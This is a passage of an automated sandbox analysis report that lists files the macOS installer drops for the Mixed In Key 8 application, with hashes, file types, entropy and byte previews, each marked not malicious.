File Type:	TIFF image data, big-endian, direntries=24, height=44, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=Traktor_Icon@2x.png, orientation=upper-left, width=44
Category:	dropped
Size (bytes):	11152
Entropy (8bit):	7.086629719668385
Encrypted:	false
SSDEEP:	96:RQ+la9gX6/y4B1IHpkCfRSkN26MT0D5MdtbZPAVwzVfKjKltZD+Xl2dYkCZJ+N2o:aY4Z/v/IJk9YNMtKwqgDsl1kYYNMtKwy
MD5:	C9A00A0F29674D3F0371EEF34BC85B51
SHA1:	07000C064ED3F254A22AA5542F8A529890586BBC
SHA-256:	AE6B9ABD62D529F2F977ABAF1631C4DBBCB8EC3A41E380D48D57B73F4AB699FD
SHA-512:	FBDD55B83C1F3CEBFE31B20E3EA3C66D34AB1856053513427A2B95FE0DD146F7EF442F8D471037977618F0571C7D19E070260614087F3B90BC9116B267596F09
Malicious:	false
Preview:	MM..................>.......................,...........,....2016:07:27 02:44:26..?.@.$....BaP.d6...DbQ8......cQ..v=....l.~M...HPQ..I..AB......nAY.U...'..FB.<..#....M"_.,AJ.Qu2&...T.G..)TX...C.R..T..._.B..S.).'.X..j4..c....T..%.~A@.WT...z.@PP\|.7..Eq0L\...2R......}._.qZB..^.-`.(+&.%.>.!9d.{.).EQ..(...R..[..W..h...+........+f..'AN.Q.7...A.4..G.d.Y.\.e!m.$.1P......0....+t...#..@hC6.3..n..Hs.9.K..$I!X.?L..F...!..B....(.. .r.m....Y..."......!0\|"V.B....o....@........$H..((...)R...)............JQ^.4.2.=.R.....C ......%....l..qj.%...9IP.:$...'...."!.x._....... ..i."W.B.&.5..p....C.Wt..{!5......sA..@...s.....i9.() ...h..!...B....H)%D ...rQ.].....kj......,.._@..mf .."Q..%...+.# ..!D.......)D...%"..t.m. ...K .Z......R"...p ...+ ..8. ...p .H.b!.v...HK&........U=JC.....hlX...N..jh!A.F(h>......lh!.....R&.,....I<..(a..J.......z ..v.:@...3.%...... .[........)2...RW$.4j.S!.j..!3-.."1..C...$...F...r.. ......<._@.2.......h!..<h!...)*...p.! ..g.....<. .W.......#\|

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_zHIygt Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	10450
Entropy (8bit):	6.647227176132132
Encrypted:	false
SSDEEP:	192:S1WoOv52x8E0lYkjeEYNMtKwYhYfAIs2MuUt:SgzE0CIeEYNg7YhYIIuuUt
MD5:	99151DD78BEA752A21F36BC4DF250549
SHA1:	55EF61C93028D4501FCCB98C9BDCC81BD88AC85A
SHA-256:	C39AFAF4E72567DAFAFA75B682A8351404BD1811F675913F6C658BDDE1AF464E
SHA-512:	127E4AEC260A57954C978579B79D7CF9AD4467F28490A82694FF5CF0A94AD260CDA6078979A0D5A735420D43E5FCC36BDE4F47E964B943669F32B588455C26B1
Malicious:	false
Preview:	bplist00..............>.?X$versionX$objectsY$archiverT$top.......x.......#.$....2.:.B.S.T.a.b.e.f.j.o.{.\|.....................................................................%.&.'.0.8.<.@.D.G.L.Q.W.X.e.n.u.z.......................................J...-...p."...w.#...$.%.&.'.(.)..+.,.-.../.0.1.2.3.4.5.8.;U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....Y.W.T.v...v.u.w.X.. ...!."[NSClassName...._..RemoveExtraSpacesViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.9..4.5.6.7.8.....M.O.Q....;.<.=.....?.@.AXNSSource]NSDestinationWNSLabel..........C.D. ...E.F.G.H.I.J.K.J.M.N.O.O.Q.R_..NSOriginalClassNameWNSFrame_. NSDoNotTranslateAutoresizingMask_..NSNextResponder[NSSuperviewXNSvFlags]NSNibTouchBar..................

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_zMzQ9w Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=24, height=44, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=iTunes_Icon@2x.png, orientation=upper-left, width=44
Category:	dropped
Size (bytes):	10776
Entropy (8bit):	7.06896799185437
Encrypted:	false
SSDEEP:	192:X9TdqMa5HR8VbkoYNMtKwkkch5qkiYNMtKwy:X9TA51R8CoYNg77ch55iYNg7y
MD5:	6F5B61B5B416863B675C5EEAE426B12E
SHA1:	2030B695EB08050137E49980B5F2DAA96D32E3CF
SHA-256:	092F029353739A97ACCDCEAA75C426A214BB765CAA436DB30C6D4082D6D52B45
SHA-512:	67F7786B1A3B21E9A093086DBE133262456EA8AFE25B304681B911F5CD7378D35344628266680D5F0EE9BB96F55024F5637BCE2D309C6DA2DC392A7BEF11E37C
Malicious:	false
Preview:	MM....F.............>.......................,...........,....2016:07:27 02:43:49..?.@.$....BaP.d6...DbQ8......cQ..v=....l.~>...`.8(..$.. .(K... .H+6...d.(.S....rZ.FU.&AI.Q.6(.. .I.Z.E...0Z]z.,...(b.^tAT.U,..`.@.RJ...h.......@.O...$..8.L...$..h.S....F.... .....z._#..)..q.....%j.X...J.BS.G.Q.W,gM..A,.\..../.q@.......c6.%..+..`.I.K...9q.d......(&....v..L..../.C..n"......!..........0.....r.....:.PD..A.X...Z..H\|...`j.. ... .:_......B.r.5 ..J.//...!..:..2R.$4.b.......Gr..0 ....$.2....Z........K...z...O.Lt...4..Hc..Jl....H4.'E..2...j.F...MHPh...........G.QK..HKeS;..9... ....M>.;...3H1...uB.k...\|.!0.a.5.....j.q....n....s....T.H.Z.!-..!,...;$...[.6....K5ge....i[.)....~!...T\..we .J.$....H)vp..!...A.bj..aH&..Wh...!#..U..I......9..f).&....... .B..f69....N.....Y..)[.d..;.:.I....>0.\.%z.l(!..!"..Vk....e(...iu....Y....F.X.HNJ..[...{.......>.[!<..R?5...<?..$.z..(........ .......#......F..&.y. .~..K.L...b...`...k..h.k.7cw.....g.0...((:..H*......E.%.y....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_4yaXFY Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11128
Entropy (8bit):	6.7284268766779185
Encrypted:	false
SSDEEP:	192:v1WVUqZC1E0lzUjeEYNMtKwpwI3Zd2zSgam3lzDV5UZp0GECF8Oo2:vgSqZkE0F4eEYNg7pwI3Z4pzJ5UAJCn7
MD5:	67450DCFA35B509BD3FA136BE9638832
SHA1:	278B285C97FF57B1CDF356FCBA1397D66ACA2200
SHA-256:	06AD2D5847B7AF7FA41C70E84970D68A640EDAE9A9C4D99F952140C69571E67D
SHA-512:	62E9B75AF5BFB3D586EF3C3CF5F48E12CEDF939ADB629E8FFC6EE68B744A96F1D2AE0EEB7BD26E92760ED53456BB59BBACF714F9DC566EAC9BCF5400D4D03A92
Malicious:	false
Preview:	bplist00..............b.cX$versionX$objectsY$archiverT$top...............#.$....2.=.E.T.U.V.c.d.g.m.n.o.p.s.y.z.{.\|........................................................... .!..8.9.C.D.N.O.P.X.`.d.h.l.o.s.x.}.~...................................................................................,.....F.G.K.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.\._U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....s.q.n...........r.. ...!."[NSClassName...._.*_TtC10MixedInKey24AddFilesWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;.....).1.f.h.k.l.K....>.?.@.A.B.C.DZNSKeyPathsXNSObjectXNSValues..........F.G. ...H.I.J.K.L.M.N.O.P.P.R.S_..NSOriginalClassNameWNSFrame_..NSNextResponder[NSSuperviewXNSvFlags]NSNibTo

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_9mPlyh Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11538
Entropy (8bit):	6.718392996706715
Encrypted:	false
SSDEEP:	192:vi4H1WNQST9K1E0lPjeEYNMtKw9mQIQAJmTdDseB8uBAW7/svR9:3gNxTkE0peEYNg79mQIQDdDseB8uBAVb
MD5:	94334FD194A49D8C386D910296B3D6AB
SHA1:	72408BC33AECE43688272C7D68580AA64E9DC88E
SHA-256:	C8FE397EA09FEFD43FA8FEDCF49DFD3400E0BF092069C4A76A575DA50B008CE5
SHA-512:	6E5874F729AA00410A56BDE88A6C338BD9BD2B03A1E29E3179A64A9E52245CAA5E7E6832A100127E9116DC73EC80E88C46A8F0B4C77E95A86E5B96B378986BFF
Malicious:	false
Preview:	bplist00..............o.pX$versionX$objectsY$archiverT$top...............#.$.*./.M.N.O.P.\.e.{.~.................................................................................!.+.,.5.6.:.;.H.K.L.M.a.b.f.g.j.m.y.\|.}.................................................................................%.=.L.H...U.V...W.X.Y.Z.[.\.].^._.`.a.b.c.d.e.f.i.lU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys...Z.t.r.n...........s.. ...!."[NSClassName...._..MIKCollectionsArrayController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,..ZNS.objects..-........0.1.2.3.4.5.6.7.8...9.:.;.<.=.>.?.@.A.B.C.D.C.F.G.H.I.J.?.L\NSWindowRect_..NSUserInterfaceItemIdentifierYNSMaxSize]NSWindowTitle\NSWindowView_..NSMinFullScreenContentSize_..NSWindowIsRestorable_..NSMaxFullScreenContentSize\NSScreenRect_..NSWindowBa

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_GHThy7 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	361061
Entropy (8bit):	6.827735719641945
Encrypted:	false
SSDEEP:	6144:cQEUooGaDtB8LuDH9LF04Jsm/WD1NPiEi/71jUJuWU:cQEZD/aEiW1U
MD5:	8BD452C03DB79C1F57D6CB2D654709D6
SHA1:	CF30235132B127F49BC76F261D7B104B9BCCCCC7
SHA-256:	C759F88554AE877313D8C51D762D88FFDEAF8DE5342154F5C36BFDAAEF1F365A
SHA-512:	8DA0E50AFC2250EBA2C647ADC04CC932D6186712C2902DFCDAD7CBED478969AF18D9DB98E353C8748C826010F7736E04BD06AD6A5F28AE1931DD1D76EDFFC5C0
Malicious:	false
Preview:	bplist00.............E.E.X$versionX$objectsY$archiverT$top................#.$....2.................!.;.>.?.@.A.D.H.I.L.P.Q.T.Y.d.e.f.t.x.y.}......................................................................... .!.-.&..+.0.;.<.=.I.J.N.O.S.X.b.c.d.q.u.v.z.......................................................................,./.;.<.=.>.?.@.A.B.C.D...E.F.P.V.W.X.[.^.a.b.c.h.i.l.q.r.s.x..................................................................................... .$.%.1.4.8.9.=.B.I.R.S.T.Z.[.a.b.c.h.r.s.t.......................................................................".#.'.,.5.9.D.E.O.P.T.W.X.Y.^.a.f.k.r.{.\|.}......................................................................... .%./.0.=.A.B.F.K.O.^.a.m...n.r.v.w.x.y.~.............................................................................$..L.+.1.2.3.8.?.H.I.J.P.Q.W.X.Y.^.e.n.o.p.v.w.}.~...........................................................................)..../.3.8.B.C.D.R.W.X.Y.^.f.i.j.k.o.t.u.~.......

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_KinK21 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	158947
Entropy (8bit):	6.70008238154239
Encrypted:	false
SSDEEP:	3072:bASCGnE4Lofp5YJblIZFGe5Gf7j4riSHYJGNd6KQg:kS7nmKIZFGJf7GiAYJ6drQg
MD5:	FBD40BB1AACCE2363A6C6FAFE61238C3
SHA1:	D927F95582B5333559F4B5943C14D055F994028C
SHA-256:	2DB08D38469B35B4EDAF6AFA85FF0197903775AEA39759EE0817BCF27103D360
SHA-512:	64DE4E13DE1574E148255F48AB413DE0AC44AA9240590321A14D9DBA8BF395B36BE6953CAAAF3EBC3BC2530287150D5B7375A2EFABF9B40C8C8E72944F7282D1
Malicious:	false
Preview:	bplist00............./2/3X$versionX$objectsY$archiverT$top................#.$....2...'.A.B.C.D.L.M.P.T.U.X.Y.Z.].b.c.d.g.l.m.n.q.v............................................................................................... .!.&.'.(.-.7.8.9.C.H.I.J.O.P.Q.V.c.d.e.j.k.y.\|...................................................................................!.&.'.(.-.../.4.>.?.@.I.N.O.P.U.V.W.\.f.g.h.q.v.w.x.}.~.....................................................................................................".#.$.)..+.0.1.2.7.@.A.B.G.H.I.N.O.P.U._.`.a.j.o.p.q.v.w.x.}................................................................................. .%.../.4.5.6.;.<.=.B.K.L.M.R.S.T.Y.Z.[.`.i.j.k.p.q.r.w.x.y.~.................................................................................................!.".#.(.1.2.7.8.9.>.?.@.E.N.O.P.U.V.W.\.].^.c.l.m.n.s.t.u.z.{.\|....................................................................................................... .%.&.'.,.-...3.<.=.>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_MKXnVB Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	4245
Entropy (8bit):	6.463560915414473
Encrypted:	false
SSDEEP:	96:0qS91WXQwpWF0s4unWdJsUlqmN6vXCvEK1NtBoA2ZobVPhnn:0391WXlpIL4unWdJ9N40vtmf8Bn
MD5:	4C9B9A447237B3618379294113A94747
SHA1:	4902A691EE7EC0A5F4C5646F09845C37B94BE195
SHA-256:	7E1EBBEFB55DD3D933187F73741CE6052CBD9B7D0A1CCDC836ECD0C88CD5F659
SHA-512:	DB7D9D250228EF4B7EA74E308B2C41C55FB91490100D3BD3DADEB61E0777AEAA1A21C1FD2E5CC37BBE8AC4496CE6C5FDE9326F12633E63E4D4D5FE5597EF0F52
Malicious:	false
Preview:	bplist00..............u.vX$versionX$objectsY$archiverT$top.......W.......#.$.*...2.8.@.O.S.d.g.k.l........................................................................................... .+.,.-...2.=.@.A.L.[.{.....}.............j.k.l.o.rU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....G.E.B.U...U.T.V.F.. ...!."[NSClassName...._.&MIKSegmentEnergySelectorViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.7..4.5.6...:.=....9.:.;.....=.>.?XNSSource]NSDestinationWNSLabel.....8.9.... .A.B.C.D.E.F.G.H.I.J.K.L.J.NZNSSubviews_..NSNextResponder_..NSViewConstraintsXNSvFlags]NSNibTouchBar[NSFrameSize.7.6...../.........+...P.7..Q......T.U.V...A.B.W.X.E.D.Y.Z.[.\.].^.=.=.a.J.L.aVNSCellWNSFrame_..NSAllowsLogicalLayoutDirect

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_MqWANA Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	13020
Entropy (8bit):	6.743872054337381
Encrypted:	false
SSDEEP:	384:Agh05wVIWaE0IpeEYNg783XKxYVevadZ+:AgaaVxNpeEYyzC+
MD5:	A943B72CF9DAE5C269EDC81D9ADCA4BD
SHA1:	A775AA843DA8008C0ECB732B5D69F1DF8D305F5C
SHA-256:	1F643DDC939883C0544E1BAA0101DAC84519CC0A4DD6AB150A72390A84489492
SHA-512:	2A93E414583725CCA0BB8D2A7497D8B1012F316A4EDFCBAA68DD3F7F5395B830AEE5A30AE16277E496EDDE48996D06653F0E392E86B80D8D27C92BA53FDCFB95
Malicious:	false
Preview:	bplist00..............M.NX$versionX$objectsY$archiverT$top...............#.$....2.<.D.a.b.c.d.l.m.p.....................................................................................$.%.&.3.4.8.9.C.D.E.M.U.Y.].a.d.i.n.t.~.....................................................................!.".(...3.8.=.B.H.N.S.X.].~.b.f.g.o.p.t.y.z.....................g.......@.....&.D.'.(.)..+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.?.@.A.B.C.D.G.JU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName...._.,_TtC10MixedInKey26BetaFeedbackViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.;..4.5.6.7.8.9.:...../.........5....=.>.?.@.A.B.CZNSKeyPathsXNSObjectXNSValues............E.F.G.H.I.J.K.L.M.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_Wod3bv Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	24075
Entropy (8bit):	6.953822746320175
Encrypted:	false
SSDEEP:	384:igp0VoHW3suohIQstNeEYNg7L/pYNg7JFcF0TnhPmCA557tANnX+NQ4rmFjb4:igpdiseeEYyBYyOqRTABkX2EjU
MD5:	38A704AC2E457AFE66B6CECBF86F570A
SHA1:	C933512282FD5C3C163CA8A7D9751523EB1A01DD
SHA-256:	5A171A79DBB260DDB9F496EA20D4D4067F1B7946D110D8F6EF90FB49B6D2A507
SHA-512:	3A01962DE62316326643D6CDE48929B96328F396968E0F6172AB5C1C58D89F755102C2DAAF079BE3F7FDAF7D858E83DEDF208FBF87C333C2141F035FEC973817
Malicious:	false
Preview:	bplist00..............].^X$versionX$objectsY$archiverT$top........u.......#.$....2.T.\.i.r.s.t.y.z.~..................................................................... .&....2.6.O.U.X.a.b.c.l.m.n.u.}.....................................C...............................................$.%.4.5.=.>.A.F.G.L.M.R.V._.`.g.h.q.r.y.z.........................................................................!.'.+.,./.2.3.6.G.H.I.L.W.X.Y.].f.g.l.n.q.............................................................................%.&.../.8.9.@.A.J.K.S.T.U.V.[.\.a.f.k.p.u.z.{.......................................................................U...".S.....i..................................................... .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.?.@.A.B.C.D.E.F.G.H.I...J.K.L.M.N.O.P.Q.R.S.T.W.ZU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsK

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_fa8osR Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	2596
Entropy (8bit):	6.68418379285922
Encrypted:	false
SSDEEP:	48:at7R1Ws0nOGokj8slExTRSEGLLUMzvOz8ejBktP/hOTeKvMFZWPNr5AB4ZwE0yGk:aD1WDlExT6Lw8OStP/4a0MFZkeB4ZL0O
MD5:	824EEC5EF95D3AE19007A3DC5CF3E805
SHA1:	11C7D3F5DF48BBC26E1DFCABB45F38D28867F715
SHA-256:	0644F5C2738293071BD54A47E3A77BAAE24FB0D94E2113F2AD94B511BDFF1A0C
SHA-512:	6B1D396B676990D75A3282A9C7A669393476CDC89C3AD2E65EA6E9AFC2CA757A3946D1FEE626C8691AB5B6492E597D3B9083C9934E130D23E7F8E6E2A78061A4
Malicious:	false
Preview:	bplist00.........X$versionX$objectsY$archiverT$top.......G...#$.29AYlmnopqrstuvwxyz{\|.}~.......N................................U$null.......................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....<.:.6.E...E.D.F.;. .!"[NSClassName...._..MIKTutorialController.%&'(Z$classnameX$classes^NSCustomObject.')XNSObject.+.,-ZNS.objects....%&/0\NSMutableSet./1)UNSSet.+.38.4567.../.1.3.5.:;<..>?@XNSSource]NSDestinationWNSLabel.....-...BCDEF.GHIJKLMNOPQRMTUVWUYGroupName_..UseBackForwardList[Preferences]NSNextKeyViewZAllowsUndoYFrameNameXNSvFlags_..NSNextResponder[NSFrameSize[NSDragTypes]NSNibTouchBar.........,..............+.Z-...[\]^_`abcdefghij.................................._..NeXT RTFD pasteboard type_..NeXT TIFF v4.0 pasteboard type_..NSFilenamesPboardType_.#Apple files promise pasteboard type_..Apple HTML pasteboard type_.NeXT Rich Text Form

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_lETCjs Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	552
Entropy (8bit):	3.754938410821478
Encrypted:	false
SSDEEP:	12:QF/LX4ogBZMIHss805R22RGLuPgL3KbJlhgvNlb6kcJGyclTvclPIi:QlLJ4UEnR0L3mrhgvN56kVywkJ
MD5:	ADE267DD9251C015A8BA6E64E884996C
SHA1:	AD0CFFE5FD769674C8F17DF298B73FCF004B0846
SHA-256:	DC821DBCC2E81B74BB7995A8EE2B9E791971B292684418F4F5B0121789D4D7B1
SHA-512:	1A1BE590F8D7A63DD9C1C603FEF33426A0C4906A5529F00D8431DBC27F71F596734851182635C92B544C5BAF7A5474951A33FA3C98D9629410A40A2971F32AE4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.8.".?.>...<.!.D.O.C.T.Y.P.E. .p.l.i.s.t. .P.U.B.L.I.C. .".-././.A.p.p.l.e././.D.T.D. .P.L.I.S.T. .1...0././.E.N.". .".h.t.t.p.:././.w.w.w...a.p.p.l.e...c.o.m./.D.T.D.s./.P.r.o.p.e.r.t.y.L.i.s.t.-.1...0...d.t.d.".>...<.p.l.i.s.t. .v.e.r.s.i.o.n.=.".1...0.".>...<.d.i.c.t.>.....<.k.e.y.>.N.S.H.u.m.a.n.R.e.a.d.a.b.l.e.C.o.p.y.r.i.g.h.t.<./.k.e.y.>.....<.s.t.r.i.n.g.>... .M.i.x.e.d. .I.n. .K.e.y. .L.L.C.,. .2.0.0.6. .-. .2.0.1.9.<./.s.t.r.i.n.g.>...<./.d.i.c.t.>...<./.p.l.i.s.t.>...

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_oMZeK8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	13596
Entropy (8bit):	6.749410708789081
Encrypted:	false
SSDEEP:	384:lgrkMoE0EeEYNg77u4SZE28VM6vQX0e9Xc3:lgQM7eEYyZxQESI
MD5:	DA57336B3C23A780C00412ED727211B5
SHA1:	F86E05C8A9B000819FBC3795D2E6D1B317073326
SHA-256:	648C8E814624A43CEFF164923EDB4FA3034D5B56641DEE5B593D262431E133FC
SHA-512:	8A64755BA1E01FC45145DD2F1A7A0E39EF211F59F408E66B77979AF6A9306763BA42489EB54AAC02232C017181C2DCE146238F98B689E056DD5A838C46F8F67D
Malicious:	false
Preview:	bplist00..............p.qX$versionX$objectsY$archiverT$top...............#.$.*...2.<.D.S.[.`.u.x.\|.......................................................................................#.(.0.5.?.@.H.I.L.O.].`.l.m.q.u.v.w.x.y.~.......................................................................-.0.<.=.A.E.F.G.H.I.N.V.[.e.f.n.o.r.u.................................................F.G...H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.b.c.d.e.f.g.j.mU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys....................... ...!."[NSClassName...._.(_TtC10MixedInKey22SoftwareViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.;..4.5.6.7.8.9.:...;.N.V.i.\|......=.>.?.....A.B.CXNSSource]NSDestinationWNSLabel.....9.:....E.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_pnaMEt Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18231
Entropy (8bit):	6.81074806346508
Encrypted:	false
SSDEEP:	384:hgJP8E0ceEYNg79u5msqHcyHAeS5GCFyOnSmGnhT8fDBkS1:hgVeEYy8qRg/Gi9GnR8fl91
MD5:	EA02D594C779CEFB5EFDC8687FFD6731
SHA1:	6AB8CCE28372075E29224521B74A682AB059FF84
SHA-256:	9D8018A045B6166FDB8352910B9C8E783F7DFC4A1039D015A47C66F34929D333
SHA-512:	C2869F048ED2807A5B84F77B61711010DBE1CFA16D7B1A46A473B4000A8CF14CA2A10C5489ED118B6CA45A248347E5D32981BA6012952D1DBB7CD51EF6D64A0E
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top........1.......#.$.*...2.C.K.h.i.j.k.s.t.w...........................................................................'.+./.3.6.;.@.F.G.L.W.X.].b.g.o.p.s.v.w.\|.......................................................................#.&.(.7.8.>.B.H.M.U.V.Z.[.^.k.l.q.u.y.............................................................#.)...4.:.@.F.L.Q.W.\.a.f.l.q.v.\|.........................................................................F.I.J.....9.....3.............C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.\|.}.~.........Y..........................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........./..../.....0.... ...!."[NSClassName...._..MIKLicenseViewController..%.&.'.(

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/English.lproj/.BC.T_sj8sEa Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	34901
Entropy (8bit):	6.781306720341854
Encrypted:	false
SSDEEP:	768:C4g0lgE260CheEYy3Pg7eEYyd0cXggeEYydBMWKyIb+7dwT+F:C4g0qE2ILjg7LHXggLQWKyBBwT+F
MD5:	9C495C3356341B6A5B0845B6D274AF52
